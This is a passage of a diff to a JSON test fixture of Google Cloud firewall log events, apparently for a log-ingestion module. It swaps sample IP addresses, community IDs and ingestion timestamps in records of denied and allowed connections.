"original": "{\"insertId\":\"5kanfzfiqepkh\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":41293},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Tula\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Tula Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:35:28.934918322Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:35:23.504719962Z\"}", "kind": "event", "action": "firewall-rule", "id": "5kanfzfiqepkh", @@ -1012,16 +1001,16 @@ "city_name": "Stavropol", "region_name": "Stavropol Krai" }, - "address": "192.0.2.251", + "address": "192.168.2.251", "port": 59106, - "ip": "192.0.2.251" + "ip": "192.168.2.251" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:KygoHJBT+06I9CnmAPRmvl5CRO4=", + "community_id": "1:TLgRm8s0Er+HDrnrkeenWw+/I0g=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1040,7 +1029,7 @@ }, "related": { "ip": [ - "192.0.2.251", + "192.168.2.251", "10.28.0.16" ] }, @@ -1081,8 +1070,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147433Z", - "original": "{\"insertId\":\"59z0t8fiow9vg\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.251\",\"src_port\":59106},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Stavropol\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Stavropol Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:36:54.238077643Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:36:52.135887769Z\"}", + "ingested": "2021-12-09T13:37:43.705448500Z", + "original": "{\"insertId\":\"59z0t8fiow9vg\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.251\",\"src_port\":59106},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Stavropol\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Stavropol Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:36:54.238077643Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:36:52.135887769Z\"}", "kind": "event", "action": "firewall-rule", "id": "59z0t8fiow9vg", @@ -1110,16 +1099,16 @@ "city_name": "Violès", "region_name": "Provence-Alpes-Côte d'Azur" }, - "address": "192.0.2.189", + "address": "192.168.2.189", "port": 61000, - "ip": "192.0.2.189" + "ip": "192.168.2.189" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:20yMRdGVeNrVtL6TKhpfMDy284w=", + "community_id": "1:fazVU7VcvYIcDuTD7cy31u/SVLg=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1138,7 +1127,7 @@ }, "related": { "ip": [ - "192.0.2.189", + "192.168.2.189", "10.28.0.16" ] }, @@ -1179,8 +1168,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147437400Z", - "original": "{\"insertId\":\"1y7e4yzff816cq\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:26.357446279Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:16.59353182Z\"}", + "ingested": "2021-12-09T13:37:43.705453300Z", + "original": "{\"insertId\":\"1y7e4yzff816cq\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:26.357446279Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:16.59353182Z\"}", "kind": "event", "action": "firewall-rule", "id": "1y7e4yzff816cq", @@ -1208,16 +1197,16 @@ "city_name": "Violès", "region_name": "Provence-Alpes-Côte d'Azur" }, - "address": "192.0.2.189", + "address": "192.168.2.189", "port": 61000, - "ip": "192.0.2.189" + "ip": "192.168.2.189" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:20yMRdGVeNrVtL6TKhpfMDy284w=", + "community_id": "1:fazVU7VcvYIcDuTD7cy31u/SVLg=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1236,7 +1225,7 @@ }, "related": { "ip": [ - "192.0.2.189", + "192.168.2.189", "10.28.0.16" ] }, @@ -1277,8 +1266,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147441400Z", - "original": "{\"insertId\":\"lx5jlsfggpr0q\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:28.203068653Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:22.930570324Z\"}", + "ingested": "2021-12-09T13:37:43.705459100Z", + "original": "{\"insertId\":\"lx5jlsfggpr0q\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:28.203068653Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:22.930570324Z\"}", "kind": "event", "action": "firewall-rule", "id": "lx5jlsfggpr0q", @@ -1306,16 +1295,16 @@ "city_name": "İzmir", "region_name": "İzmir" }, - "address": "192.0.2.200", + "address": "192.168.2.200", "port": 42716, - "ip": "192.0.2.200" + "ip": "192.168.2.200" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:6fenc8+hp2KWF1J9vvGwv3iswV0=", + "community_id": "1:5cdw7jmZns9wqKsd7hRHlQJgaQ4=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1334,7 +1323,7 @@ }, "related": { "ip": [ - "192.0.2.200", + "192.168.2.200", "10.28.0.16" ] }, @@ -1375,8 +1364,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147445200Z", - "original": "{\"insertId\":\"18ynfbufer19m1\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.0.2.200\",\"src_port\":42716},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"İzmir\",\"continent\":\"Asia\",\"country\":\"tur\",\"region\":\"İzmir\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:32:14.038485761Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:32:07.407039908Z\"}", + "ingested": "2021-12-09T13:37:43.705567900Z", + "original": "{\"insertId\":\"18ynfbufer19m1\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.200\",\"src_port\":42716},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"İzmir\",\"continent\":\"Asia\",\"country\":\"tur\",\"region\":\"İzmir\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:32:14.038485761Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:32:07.407039908Z\"}", "kind": "event", "action": "firewall-rule", "id": "18ynfbufer19m1", @@ -1390,23 +1379,12 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } + "continent_name": "America", + "country_name": "usa" }, - "address": "8.8.8.8", + "address": "67.43.156.13", "port": 80, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "name": "network:default/firewall:adrian-test-1" @@ -1422,7 +1400,7 @@ ], "network": { "name": "default", - "community_id": "1:L+yxRTY3bxAv2hbljIrAstKlE+g=", + "community_id": "1:t2QQzu4ufNOZo7NH5i90Aqyel1Q=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1442,7 +1420,7 @@ "related": { "ip": [ "10.28.0.16", - "8.8.8.8" + "67.43.156.13" ] }, "gcp": { @@ -1478,8 +1456,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147448900Z", - "original": "{\"insertId\":\"tzddthfsr6fv5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"8.8.8.8\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.28.0.16\",\"src_port\":46418},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:41:28.971534988Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:41:20.972747063Z\"}", + "ingested": "2021-12-09T13:37:43.705590600Z", + "original": "{\"insertId\":\"tzddthfsr6fv5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.28.0.16\",\"src_port\":46418},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:41:28.971534988Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:41:20.972747063Z\"}", "kind": "event", "action": "firewall-rule", "id": "tzddthfsr6fv5", @@ -1493,23 +1471,12 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } + "continent_name": "America", + "country_name": "usa" }, - "address": "8.8.8.8", + "address": "67.43.156.13", "port": 80, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "name": "network:default/firewall:adrian-test-1" @@ -1525,7 +1492,7 @@ ], "network": { "name": "default", - "community_id": "1:c7bqGkBTPmOmWydHv/uxpk1qOjc=", + "community_id": "1:91bfvmXgXGnCZmHTsH6bUtpBCwY=", "transport": "udp", "type": "ipv4", "iana_number": "17", @@ -1545,7 +1512,7 @@ "related": { "ip": [ "10.28.0.16", - "8.8.8.8" + "67.43.156.13" ] }, "gcp": { @@ -1581,8 +1548,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147473900Z", - "original": "{\"insertId\":\"1k2b7kefsnhzq7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"8.8.8.8\",\"dest_port\":80,\"protocol\":17,\"src_ip\":\"10.28.0.16\",\"src_port\":58725},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:42:33.671883883Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:42:26.50532921Z\"}", + "ingested": "2021-12-09T13:37:43.705596600Z", + "original": "{\"insertId\":\"1k2b7kefsnhzq7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":80,\"protocol\":17,\"src_ip\":\"10.28.0.16\",\"src_port\":58725},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:42:33.671883883Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:42:26.50532921Z\"}", "kind": "event", "action": "firewall-rule", "id": "1k2b7kefsnhzq7", @@ -1608,17 +1575,17 @@ "continent_name": "America", "country_name": "usa" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 44666, "domain": "test-kibana", - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:DAX43chSGct8LhjTchX9JgmQSEE=", + "community_id": "1:71E7EwkkBhmIXFYLBhatQg26r3M=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1637,7 +1604,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.42.0.10" ] }, @@ -1689,8 +1656,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147492300Z", - "original": "{\"insertId\":\"1sdfuwxfk8hq1c\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":44666},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.531819246Z\"}", + "ingested": "2021-12-09T13:37:43.705601100Z", + "original": "{\"insertId\":\"1sdfuwxfk8hq1c\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":44666},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.531819246Z\"}", "kind": "event", "action": "firewall-rule", "id": "1sdfuwxfk8hq1c", @@ -1716,17 +1683,17 @@ "continent_name": "America", "country_name": "usa" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 44668, "domain": "test-kibana", - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:TPU3xS0q892TRpPVImmLO31ok9s=", + "community_id": "1:kjnX5ow0hgQpA+DuU3FS4Bz+93M=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1745,7 +1712,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.42.0.10" ] }, @@ -1797,8 +1764,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147497700Z", - "original": "{\"insertId\":\"1sdfuwxfk8hq1b\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":44668},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.551617516Z\"}", + "ingested": "2021-12-09T13:37:43.705605700Z", + "original": 